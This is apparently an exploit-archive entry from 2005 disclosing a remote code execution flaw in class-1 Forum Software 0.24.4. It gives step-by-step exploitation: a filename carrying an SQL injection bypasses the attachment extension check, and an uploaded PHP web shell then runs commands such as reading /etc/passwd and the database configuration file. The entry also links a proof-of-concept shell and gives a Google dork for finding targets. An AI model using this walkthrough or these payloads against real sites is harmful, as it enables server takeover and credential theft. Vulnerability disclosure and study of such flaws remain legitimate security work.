Google Search: “Powered by and copyright class-1″ 0.24.4
rgod rates this entry 10 out of 10.
Submitted: 2005-09-08 00:00:00
Added by: rgod
class-1 Forum Software v 0.24.4 Remote code executionsoftware: site: http://www.class1web.co.uk/softwaredescription: class-1 Forum Software is a PHP/MySQL driven web forum. It is written and distributedunder the GNU General Public License which means that its source is freely-distributedand available to the general public. vulnerability: the way the forum checks attachment extensions…look at the vulnerable code at viewforum.php 256-272 lines.nothing seems so strange, but… what happen if you try to upload a filewith this name? :shell.php.’ or ‘a’ =’a;) SQL INJECTION!The query and other queries like this become:SELECT * FROM [extensions table name] WHERE extension=” or ‘a’ =’a’ AND file_type=’Image’you have bypassed the check… now an executable file is uploaded, because for Apache, bothon Windows and Linux a file with that name is an executable php file…you can download a poc file from my site, at url:http://rgod.altervista.org/shell.zipinside we have:you can do test manually, unzip the file, register, login, post this file as attachment, thengo to this url to see the directory where the attachment has been uploaded:http://[target]/[path]/viewattach.phpyou will be redirected to:http://[target]/[path]/[upload_dir]/then launch commands:http://[target]/[path]/[upload_dir]/shell.php.’%20or%20′a’%20=’a?command=cat%20/etc/passwdto see /etc/passwd filehttp://[target]/[path]/[upload_dir]/shell.php.’%20or%20′a’%20=’a?command=cat%20./../db_config.incto see database username and passwordand so on…you can see my poc exploit at this url:http://www.rgod.altervista.org/class1.htmlgoogledork: “Powered by and copyright class-1″rgodsite: http://rgod.altervista.orgmail: retrogod [at] aliceposta . it